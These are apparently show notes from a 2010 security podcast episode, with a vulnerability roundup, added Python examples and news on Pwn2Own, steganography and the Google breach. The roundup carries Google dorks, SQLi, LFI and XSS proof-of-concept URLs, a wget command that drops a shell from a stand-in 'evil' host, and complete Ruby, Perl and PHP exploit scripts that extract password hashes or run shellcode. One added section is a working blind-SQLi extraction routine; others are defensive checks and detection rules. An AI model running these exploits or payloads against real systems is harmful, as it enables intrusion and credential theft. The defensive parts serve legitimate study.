Your daily source of Pwnage, Policy and Politics.

Episode 110 – Have you stego’d today?


ISD Podcast Episode 110 for April 16, 2010. This podcast is our contribution back to the community: we discuss the vulnerabilities of interest and information-security news, hopefully providing you a few laughs and a little knowledge.

Announcements:
MyHardDriveDied.com:

  • MHDD Data Recovery Class current dates and locations:
    • San Diego – May 10th-14th
    • San Francisco – June 14th -18th
    • Atlanta – July – 12th-16th
    • Chicago – September – 13th – 17th
    • Dallas, TX – October – 11th – 15th
    • Washington DC – December 6th – 10th
    • Cost is $3500 per class. To reserve and register, call (678) 445-9007, email smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Atlanta ISSA:

Kentuckiana ISSA:

Friends of the Podcast: Webhosting services: WebSpeedway

Vulnerabilities of Interest:

    1. Zomplog is subject to a Cross Site Scripting (XSS) vulnerability.  Version 3.9 is impacted, though others may be as well.  Proof of Concept URL is available (the doubled "script" in the tag is a filter-evasion payload: a filter that strips the string "script" once leaves "<script>" behind): http://www.sample.com/index.php?search="><scrscriptipt>alert(1)</scrscriptipt>
    2. MKPortal Anekdot module is listed as subject to a SQL Injection vulnerability, but the Proof of Concept URLs supplied are reflected Cross Site Scripting (XSS) payloads in the output, blocks and contents parameters: http://www.sample.com/Anekdot/?output=%3Cscript%3Ealert(1)%3C/script%3E http://www.sample.com/Anekdot/?blocks=%3Cscript%3Ealert(1)%3C/script%3E http://www.sample.com/Anekdot/?contents=%3Cscript%3Ealert(1)%3C/script%3E
    3. mygamingladder MGL Combo System is subject to a SQL Injection vulnerability.  Versions older than 7.5 are impacted, though others may be as well.  Exploit code is available (the newsid parameter takes a UNION SELECT that reads id, pass and email from the users table; each value is wrapped in runs of 0x23 ('#') so it can be cut out of the HTML with a regex):

        #!/usr/bin/ruby
        # 4004-security-project.com
        # Discovered and vulnerability by Easy Laster
        require 'net/http'

        print "
        #########################################################
        #            4004-Security-Project                      #
        #########################################################
        #             mygamingladder MGL Combo System 7.5       #
        #                          Exploit                      #
        #                     Using Host+Path                   #
        #                     www.demo.de /forum/               #
        #                         Easy Laster                   #
        #########################################################
        "
        print "#########################################################"
        print "\nEnter host name (site.com)->"
        host = gets.chomp
        print "#########################################################"
        print "\nEnter script path (/forum/)->"
        path = gets.chomp
        print "\n#########################################################"

        # Each request injects into newsid: the selected column is padded with
        # five 0x23 ('#') bytes on either side, then cut out of the HTML by regex.
        begin
          dir = "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+"
          http = Net::HTTP.new(host, 80)
          resp = http.get(path + dir)
          print "\nid -> " + (/#####(.+)#####/).match(resp.body)[1]

          dir = "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,pass,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+"
          http = Net::HTTP.new(host, 80)
          resp = http.get(path + dir)
          print "\npassword -> " + (/#####(.+)#####/).match(resp.body)[1]

          dir = "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,email,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+"
          http = Net::HTTP.new(host, 80)
          resp = http.get(path + dir)
          print "\nEmail -> " + (/#####(.+)#####/).match(resp.body)[1]

          print "\n#########################################################"
        rescue
          # Any network error or a missing match (regex returned nil) ends up here
          print "\nExploit failed"
        end
    4. Joomla component allvideos is subject to a SQL Injection vulnerability.  Google Dork inurl:option=com_allvideos.  Proof of Concept URL is available: http://www.sample.com/xampp/joomla/index.php?option=com_allvideos&id=1339/**/AND/**/1=2/**/UNION+SELECT/**/1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12+from+jos_users--
    5. Joomla Component com_properties[aid] is subject to a SQL Injection vulnerability.  Google Dork inurl:option=com_properties.  Example URL is available: http://www.sample.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
    6. Joomla Component com_ca is subject to a SQL Injection vulnerability.  Version 1.0 is impacted, though others may be as well.  Google Dork inurl:option=com_ca.  Example URL is available: http://www.sample.com/index.php?option=com_ca&id=[SQL INJECTION]
    7. Joomla component education is subject to a SQL Injection vulnerability.  Google Dork inurl:option=com_education.  Example URL is available: http://www.sample.com/xampp/joomla/index.php?option=com_education_classes&task=showEvents&id=11/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
    8. Joomla Component TRAVELbook is subject to a Local File Inclusion (LFI) vulnerability.  Version 1.0.1 is impacted, though others may be as well.  Google Dork inurl:option=com_travelbook.  Example URLs are available (the second one is a remote-inclusion test rather than a local one): http://www.sample.com/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 http://www.sample.com/index.php?option=http://evil/exploit
    9. Joomla Component AlphaUserPoints is subject to a Local File Inclusion (LFI) vulnerability. Version 1.5.5 is impacted, though others may be as well.  Google Dork inurl:option=com_alphauserpoint. Example URL is available:   http://www.sample.com/index.php?option=com_alphauserpoint&view=../../../../../../../../../../etc/passwd%00
    10. Joomla Component spsNewsletter is subject to a Local File Inclusion (LFI) vulnerability. Google Dork inurl:option=com_spsnewsletter. Example URL is available:   http://www.sample.com/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../etc/passwd%00
    11. Joomla Component RokModule is subject to a SQL Injection vulnerability (boolean-based blind: the page renders when the injected condition is true and not when it is false).  Google Dork inurl:option=com_rokmodule.  Proof of Concept URLs are available; the first condition is true on a MySQL 5.x server and the second false, so the difference between the two responses confirms the injection: http://www.sample.com/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=5 (true) http://www.sample.com/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=4 (false)
    12. Joomla Component Preventive And Reservation is subject to a Local File Inclusion (LFI) vulnerability. Version 1.0.5 is impacted, though others may be as well.  Google Dork inurl:com_preventive&controller. Example URL is available: http://www.sample.com/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00
    13. Trellian FTP Client PASV is subject to a Buffer Overflow vulnerability.  Version 3.01 is impacted, though others may be as well.  Exploit code is available (a malicious FTP server: once the client logs in and sends PASV, the oversized "227 Entering Passive Mode" reply overflows the client's buffer and runs a calc.exe payload):

        #!/usr/bin/perl
        use warnings;
        use strict;
        use IO::Socket;

        # Listen on the FTP control port and wait for the vulnerable client to connect
        my $ftpsock = new IO::Socket::INET(
            LocalPort => '21',
            Proto     => 'tcp',
            Listen    => '1'
        ) or die "Socket Not Created $!\n";

        print "#############################################################\n"
            . "#          Trellian FTP Client PASV BOF exploit             #\n"
            . "#          Author:zombiefx                                  #\n"
            . "#          Greetz to: corelanc0d3r/Dino Dai Zovi            #\n"
            . "#          http://pentest.cryptocity.net/exploitation/      #\n"
            . "#          http://www.corelan.be:8800                       #\n"
            . "#############################################################\n";

        my $junk   = "\x41" x 200;                 # filler up to the saved return address
        my $jmpesp = pack( 'V', 0x7E429353 );      #oops
        my $nops   = "\x90" x 50;                  # NOP sled in front of the payload
        my $calcshell =                            # encoded calc.exe shellcode
              "\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49"
            . "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
            . "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
            . "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
            . "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
            . "\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47"
            . "\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c"
            . "\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a"
            . "\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50"
            . "\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43"
            . "\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a"
            . "\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c"
            . "\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44"
            . "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c"
            . "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47"
            . "\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50"
            . "\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44"
            . "\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43"
            . "\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42"
            . "\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b"
            . "\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45"
            . "\x31\x42\x4c\x42\x43\x45\x50\x41\x41";

        while ( my $data = $ftpsock->accept() ) {
            print "Client Connected!\nAwaiting Ftp commands: \n";
            print $data "220 Welcome ;) !\r\n";
            while (<$data>) {
                print;    # echo each client command to the console
                print $data "331 Anonymous access allowed,send e-mail as password.\r\n" if (/USER/i);
                print $data "230-Welcome to the EVIL server\n230 User logged in.\r\n"  if (/PASS/i);
                print $data "257 \"/\" is current directory.\r\n"                      if (/PWD/gis);
                # The trigger: the PASV reply carries junk + return address + NOPs + shellcode
                print $data "227 Entering Passive Mode (" . $junk . $jmpesp . $nops . $calcshell . ").\r\n" if (/PASV/i);
                print $data "150 Here comes the directory listing.\r\n226 Directory send OK.\r\n" if (/LIST/i);
            }
        }
    14. xBtiTracker is subject to a SQL Injection vulnerability.  Version 2.0.0 - revision 559 and older are impacted, though others may be as well.  Exploit code is available (the injection goes through the uid cookie and uses the MySQL duplicate-key trick, count(0) with group by floor(rand(0)*2), to force an error message that carries the selected user row):

        <?php
        // Usage: php btit.php URL ID UserName
        if (isset($argv[3])) {
            $site = $argv[1];
            $id   = $argv[2];
            $name = $argv[3];

            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $site);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT, 30);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            // The uid cookie is used unescaped in a query; the subselect pulls
            // id:username:password:email for the target user and the group-by
            // duplicate key error echoes it back in the page.
            curl_setopt($ch, CURLOPT_COOKIE, "uid=$id+or+(1,1)=(select+count(0),concat((select+concat_ws(0x3a,id,username,password,email,0x3a3a3a)+from+xbtit_users+where+username='$name'),floor(rand(0)*2))from(information_schema.tables)group+by+2);");
            $result = curl_exec($ch);

            // id:username:<32 hex password hash>:email followed by the ::: marker
            preg_match("/(\d+:.*:[\w\d]{32}:.*):::/i", $result, $match);
            printf("\nResult: %s\n", $match[1]);
        } else {
            print("====================================\n Usage: php btit.php URL ID UserName\n Example: php btit.php http://site.com/ 2 admin\n ====================================\n");
        }
        ?>
    15. MediaInSpot CMS is subject to a Local File Inclusion (LFI) vulnerability.  Example URLs are available (the second one is a remote-inclusion test): http://www.sample.com/view/lang/index.php?page=?page=../../../../../../../../etc/passwd%00 http://www.sample.com/view/lang/index.php?page=?page=http://evil/exploit?
    16. AuroraGPT is subject to a Remote Command Execution vulnerability.  Version 4 is impacted, though others may be as well.  Example URL is available (the cmd parameter carries a wget command that drops a PHP shell on the server): http://www.sample.com/index.php?view=help&faq=11&ref&cmd=wget http://evil/exploit.txt -O shell.php
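The Joomla LFI items above (TRAVELbook, AlphaUserPoints, spsNewsletter, Preventive And Reservation) all have the same shape: a request parameter is joined onto a file path, and the trailing %00 makes PHP before 5.3.4 stop reading the path at the NUL, so whatever extension the code appends is lost. The following is an added Python example, not code from any of those components or from the podcast; the web-root layout, the controller naming rule and the function names are assumptions chosen to mirror the PoC URLs.

```python
import os
import re


def vulnerable_include_path(base_dir: str, controller: str) -> str:
    """The LFI shape: the request parameter is spliced straight into a path.
    (Assumed layout: <base_dir>/controllers/<name>.php; illustrative only.)"""
    return os.path.normpath(os.path.join(base_dir, "controllers", controller + ".php"))


def safe_include_path(base_dir: str, controller: str) -> str:
    """Allowlist the name first, then prove the resolved path stays inside the
    controller directory. Either check alone stops the PoC; both together
    survive a later loosening of the allowlist or a stray symlink."""
    if "\x00" in controller:
        raise ValueError("NUL byte in controller name")
    # Plain identifiers only; this alone rules out "../" and URL schemes.
    if not re.fullmatch(r"[a-z][a-z0-9_]{0,31}", controller):
        raise ValueError("controller name outside allowlisted character set")
    root = os.path.realpath(os.path.join(base_dir, "controllers"))
    candidate = os.path.realpath(os.path.join(root, controller + ".php"))
    # realpath follows symlinks, so a link inside the directory pointing
    # outside it is also caught by the containment check.
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("resolved path escapes the controller directory")
    return candidate


def demo() -> dict:
    """Run the decoded PoC payload (../../etc/passwd%00) through both versions."""
    base = "/var/www/joomla"                       # assumed web root
    payload = "../../../../../../etc/passwd\x00"   # decoded form of the PoC value
    out = {"vulnerable": vulnerable_include_path(base, payload)}
    try:
        safe_include_path(base, payload)
        out["safe"] = "accepted"
    except ValueError as exc:
        out["safe"] = f"rejected: {exc}"
    return out


if __name__ == "__main__":
    print(demo())
```

In the vulnerable version the payload normalizes to /etc/passwd followed by a NUL and the ".php" suffix; a C-backed open() in old PHP reads only up to the NUL, which is exactly why the PoCs end in %00. The safe version rejects it at the NUL check, and would reject it again at the allowlist and the containment check if that one were removed.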
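The RokModule proof of concept is a boolean oracle: one request with a true condition, one with a false condition, and the difference between the two responses tells you whether a guess about @@version was right. The added example below (mine, not RokModule's or the podcast's) drives such an oracle to recover an entire string with a binary search per character, which is how the single true/false pair in the PoC generalizes into data extraction. An in-memory SQLite table stands in for the MySQL back end, so sqlite_version(), substr() and unicode() take the place of @@version, SUBSTRING() and ASCII(); the modules table, its rows and the function names are constructed for the demo.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the CMS database (two fake module rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE modules (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO modules VALUES (?, ?)",
                     [(140, "Latest News"), (141, "Login Form")])
    return conn


def vulnerable_lookup(conn, moduleid: str) -> bool:
    """Injectable: moduleid is concatenated into the statement, as the PoC implies."""
    row = conn.execute("SELECT title FROM modules WHERE id=" + moduleid).fetchone()
    return row is not None


def safe_lookup(conn, moduleid: str) -> bool:
    """Fixed form: cast to int and bind, so '140 AND ...' is rejected outright."""
    row = conn.execute("SELECT title FROM modules WHERE id=?", (int(moduleid),)).fetchone()
    return row is not None


def oracle(conn, condition: str) -> bool:
    """The PoC's oracle: 'moduleid=140 AND <condition>' either renders the module or not."""
    return vulnerable_lookup(conn, "140 AND (" + condition + ")")


def extract_string(conn, expr: str, max_len: int = 64):
    """Recover the value of a SQL expression one character at a time.
    Each character is found by binary search over printable ASCII (32..126),
    so about 7 oracle queries per character instead of up to 95 equality tests.
    Returns (recovered_string, number_of_queries)."""
    result, queries = "", 0
    for pos in range(1, max_len + 1):
        queries += 1
        if not oracle(conn, f"length({expr}) >= {pos}"):
            break                                   # past the end of the string
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            queries += 1
            if oracle(conn, f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result, queries


def demo() -> dict:
    conn = make_db()
    version, queries = extract_string(conn, "sqlite_version()")
    try:
        safe_lookup(conn, "140 AND 1=1")
        rejected = False
    except ValueError:
        rejected = True
    return {
        "version": version,
        "queries": queries,
        "version_matches": version == sqlite3.sqlite_version,
        "safe_rejects_injection": rejected,
    }


if __name__ == "__main__":
    print(demo())
```

Against a real target the same loop would be driven by HTTP requests, with "renders the module" as the true branch; the query budget is what makes blind injection practical, and it is also what makes it noisy in logs (dozens of near-identical requests differing only in a comparison constant).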
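For defenders, the proof-of-concept URLs above double as detection content. The added example below (not from the podcast or any of the listed projects) runs a handful of rules over constructed Apache-style access-log lines modelled on those PoCs: it URL-decodes twice, treats "+" as a space, collapses the /**/ comment padding used in several of the Joomla injections, and then tags each request as XSS, SQLi, LFI, RFI or RCE. The log lines, IP addresses, timestamps and rule names are made up for the demo.

```python
import re
from urllib.parse import unquote

# Constructed sample log (fake hosts); request targets are modelled on the PoC URLs above.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Apr/2010:10:01:02 +0000] "GET /index.php?search=%22%3E%3Cscrscriptipt%3Ealert(1)%3C/scrscriptipt%3E HTTP/1.1" 200 512
10.0.0.5 - - [16/Apr/2010:10:01:03 +0000] "GET /index.php?option=com_allvideos&id=1339/**/AND/**/1=2/**/UNION+SELECT/**/1,2,concat(username,0x3a,password),4+from+jos_users-- HTTP/1.1" 200 2048
10.0.0.5 - - [16/Apr/2010:10:01:04 +0000] "GET /index.php?option=com_travelbook&controller=../../../../../../etc/passwd%00 HTTP/1.1" 200 1843
10.0.0.5 - - [16/Apr/2010:10:01:05 +0000] "GET /index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=140+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 300
10.0.0.5 - - [16/Apr/2010:10:01:06 +0000] "GET /index.php?view=help&faq=11&cmd=wget%20http://evil/exploit.txt%20-O%20shell.php HTTP/1.1" 200 100
10.0.0.7 - - [16/Apr/2010:10:01:07 +0000] "GET /view/lang/index.php?page=http://evil/exploit HTTP/1.1" 200 100
10.0.0.9 - - [16/Apr/2010:10:02:00 +0000] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Rules are applied to the normalized query string (decoded, lowercased, comment-stripped).
RULES = {
    "xss":  re.compile(r"<[^>]*script[^>]*>|\balert\s*\(|\bon(error|load|click|mouseover)\s*=", re.I),
    "sqli": re.compile(r"\bunion\b\s+(all\s+)?select\b|\b(and|or)\b\s+\d+\s*=\s*\d+"
                       r"|@@version|\bversion\s*\(|\bsubstring\s*\(|\bconcat(_ws)?\s*\(", re.I),
    "lfi":  re.compile(r"(\.\./){2,}|\x00|/etc/passwd", re.I),
    "rfi":  re.compile(r"=\s*https?://", re.I),
    "rce":  re.compile(r"\b(wget|curl)\s+https?://|[;|`]\s*(cat|ls|id|uname)\b", re.I),
}


def normalize(target: str) -> str:
    """Decode twice (catches %2500-style double encoding), treat '+' as a space,
    turn /**/ comment padding into whitespace, collapse runs of whitespace, lowercase."""
    query = target.partition("?")[2]
    s = unquote(unquote(query.replace("+", " ")))
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s).lower()


def classify(target: str) -> set:
    """Return the set of rule names that fire on one request target."""
    q = normalize(target)
    return {name for name, rx in RULES.items() if rx.search(q)}


def scan_log(text: str) -> list:
    """Parse each log line and report the ones that trip at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m["target"])
        if tags:
            findings.append({"ip": m["ip"], "target": m["target"], "tags": sorted(tags)})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["tags"], f["target"])
```

The rule that catches the Zomplog payload is the tag-shaped one: matching "script" anywhere inside a <...> still fires on <scrscriptipt>, whereas a naive "<script" check is exactly what that payload was built to slip past. The double decode and /**/ stripping matter for the same reason on the SQL side; expect to tune these patterns against your own traffic before treating a hit as more than a lead.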

Stories of Interest:
    News item 1:  http://www.computerworld.com/s/article/9175503/Apple_patches_Pwn2Own_bug?taxonomyId=17
    Apple patched a critical Mac OS X vulnerability used by a security researcher three weeks ago to win $10,000 for hacking Safari at the Pwn2Own contest. The patch is the second resulting from the fourth annual Pwn2Own, which was held at the CanSecWest security conference in Vancouver, British Columbia March 24-26. On the first day of the contest, Charlie Miller, an analyst at Baltimore-based Independent Security Evaluators, hacked Safari running on Mac OS X 10.6, aka Snow Leopard. Miller is the only researcher to ever win three times at Pwn2Own. Miller confirmed that the vulnerability Apple patched was the one he used last month to earn a $10,000 prize. "That must be it," he said. "I haven't given them any other bugs."

    News item 2: http://www.networkworld.com/news/2010/040910-steganography-data-loss.html
    There's a potential new form of steganography — the sending of messages in ways that leave no hint the messages even exists — that could lead to corporate data loss via CDs. Steganography is just one application of technology being researched at Princeton University primarily to create instruments that can see through fog but that could also be used to reveal hidden messages, says one of the researchers, Jason Fleischer, an assistant professor of electrical engineering at the school. If the latest steganography application is brought to fruition, data could be stored on CDs in a way that renders it undetectable by conventional CD players. But with a specially designed player, the hidden data could be read. The researchers' discoveries could also be applied to building radars that work better in storms, improving the imaging of sonograms and crafting night vision goggles with better resolution. In the case of steganography, if thieves could burn stolen data as hidden messages onto part of a CD, the rest could contain benign data that would lead corporate security professionals to think it was a run-of-the-mill CD containing unimportant data. Once the CD was outside corporate control, a special reader could reveal the stolen intellectual property. The technology relies on a characteristic called stochastic resonance, the ability to refocus optical noise so it strengthens the optical signal that it is obscuring, Fleischer says. In the case of fog, images of objects are obscured because the water vapor diffuses the light bouncing off them.

    News item 3: http://news.cnet.com/8301-30684_3-20002315-265.html
    Google learned some hard security lessons after it was attacked late last year by hackers, CEO Eric Schmidt said Monday. "Google is now particularly paranoid about that," Schmidt said during a question-and-answer session following Google's Atmosphere 2010 conference before about 400 CIOs. After the company learned that some of its intellectual property was stolen during an attack that originated from inside China, it began locking down its systems to a greater degree and accelerated plans to move to Web-based systems like Chrome OS netbooks. The attacks took advantage of a flaw in Internet Explorer 6 that was quickly patched, although the damage had been done. More than 30 U.S. companies were believed to be targeted by the attacks, but Google was one of the few that publicly identified itself as a victim because "we decided we had to tell people as a warning," Schmidt said. He declined to get into the specifics of how the attackers penetrated Google's security but said the attackers broke into a single system with the outdated browser and were then able to take "a series of steps" to wreak wider havoc. Google tightened its external defenses and moved quickly to update all the software within its walls following the deconstruction of the attack.

    News item 4:  http://gadgetwise.blogs.nytimes.com/2010/04/08/chrome-browser-unhacked/
    At last month's Pwn2Own contest, every browser fell except Chrome. No one even tried to hack it. Why isn't entirely clear. Chrome has some security advantages, but its survival doesn't mean the browser is unbreakable or the most secure, says TippingPoint's Aaron Portnoy, who organized Pwn2Own. Researchers come to the contest with attacks in their pockets, and like malicious hackers they tend to focus on the most broadly used software. Chrome has a small, albeit growing, market share of 6.1% in March, according to Net Applications. "People think that their time is better spent finding bugs in more popular software because it's worth more money," Mr. Portnoy said. Nevertheless, Chrome, as the newest browser on the market, includes security advances that make it an "interesting target."